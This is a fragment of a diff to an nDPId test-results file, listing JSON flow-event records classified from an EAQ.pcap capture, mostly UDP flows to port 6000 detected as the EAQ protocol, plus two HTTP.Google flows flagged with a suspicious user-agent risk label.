-00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":169,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820968101,"flow_last_seen":1432821032791,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821032791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.136.67","src_port":60013,"dst_port":6000,"l4_proto":"udp","ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
-00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":170,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820969101,"flow_last_seen":1432821033791,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821033791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.149.66","src_port":33356,"dst_port":6000,"l4_proto":"udp","ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
-00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820970111,"flow_last_seen":1432821034791,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821034791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.134.67","src_port":40058,"dst_port":6000,"l4_proto":"udp","ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
-00643{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":187,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820949685,"flow_last_seen":1432821035985,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821041151,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.185.125.226","src_port":48890,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
-00642{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":187,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820950801,"flow_last_seen":1432821036105,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821041151,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.148.66","src_port":42620,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
-00640{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":187,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820950935,"flow_last_seen":1432821037152,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821041151,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.141.68","src_port":34687,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
-00642{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":187,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820949735,"flow_last_seen":1432821036045,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821041151,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.148.67","src_port":51569,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
-00640{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":187,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820949806,"flow_last_seen":1432821036155,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821041151,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.141.66","src_port":41438,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
-00642{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":187,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820950865,"flow_last_seen":1432821036155,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821041151,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.148.68","src_port":43641,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
-00643{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":187,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820949586,"flow_last_seen":1432821035895,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821041151,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.185.138.146","src_port":52257,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
-00639{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820957985,"flow_last_seen":1432821044555,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.141.67","src_port":48563,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
-00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820959035,"flow_last_seen":1432821045664,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.132.68","src_port":52726,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
-00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820949685,"flow_last_seen":1432821035985,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.185.125.226","src_port":48890,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
-00639{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820955933,"flow_last_seen":1432821042151,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.129.66","src_port":48666,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
-00640{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820950801,"flow_last_seen":1432821036105,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.148.66","src_port":42620,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
-00639{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820960101,"flow_last_seen":1432821024791,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.133.67","src_port":57004,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
-00639{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820962101,"flow_last_seen":1432821025791,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.136.66","src_port":36552,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
-00694{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1432820948836,"flow_last_seen":1432820949347,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2764,"flow_tot_l4_payload_len":9813,"flow_avg_l4_payload_len":700,"midstream":0,"ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.24","src_port":40467,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"11":"HTTP Suspicious User-Agent"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"}}
-00639{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820965101,"flow_last_seen":1432821029791,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.134.68","src_port":59098,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
-00639{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820967101,"flow_last_seen":1432821031791,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.149.68","src_port":36577,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
-00639{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820961101,"flow_last_seen":1432821026791,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.133.68","src_port":53059,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
-00638{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820950935,"flow_last_seen":1432821037152,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.141.68","src_port":34687,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
-00639{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820952931,"flow_last_seen":1432821039151,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.137.66","src_port":53354,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
-00639{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820964101,"flow_last_seen":1432821028791,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.134.66","src_port":47346,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
-00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820958981,"flow_last_seen":1432821045604,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.132.67","src_port":39185,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
-00639{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820951932,"flow_last_seen":1432821038152,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.137.67","src_port":39221,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
-00640{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820949735,"flow_last_seen":1432821036045,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.148.67","src_port":51569,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
-00690{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1432820948562,"flow_last_seen":1432820948767,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":548,"flow_tot_l4_payload_len":648,"flow_avg_l4_payload_len":72,"midstream":0,"ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.48","src_port":53497,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"11":"HTTP Suspicious User-Agent"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"}}
-00638{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820949806,"flow_last_seen":1432821036155,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.141.66","src_port":41438,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
-00639{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820953931,"flow_last_seen":1432821040151,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.137.68","src_port":59959,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
-00639{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820969101,"flow_last_seen":1432821033791,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.149.66","src_port":33356,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
-00639{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820956931,"flow_last_seen":1432821043151,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.129.68","src_port":47714,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
-00639{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820968101,"flow_last_seen":1432821032791,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.136.67","src_port":60013,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
-00640{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820950865,"flow_last_seen":1432821036155,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.148.68","src_port":43641,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
-00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820949586,"flow_last_seen":1432821035895,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.185.138.146","src_port":52257,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
-00639{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820959095,"flow_last_seen":1432821045664,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.133.66","src_port":56128,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
-00639{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820963101,"flow_last_seen":1432821027791,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.136.68","src_port":43934,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
-00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820957932,"flow_last_seen":1432821044555,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.132.66","src_port":43979,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
-00639{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820966101,"flow_last_seen":1432821030791,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.149.67","src_port":50175,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
-00639{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820954931,"flow_last_seen":1432821041151,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.129.67","src_port":37985,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
-00639{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820970111,"flow_last_seen":1432821034791,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.134.67","src_port":40058,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":145,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820949806,"flow_last_seen":1432821014655,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821014655,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.141.66","src_port":41438,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820950935,"flow_last_seen":1432821015651,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821015651,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.141.68","src_port":34687,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
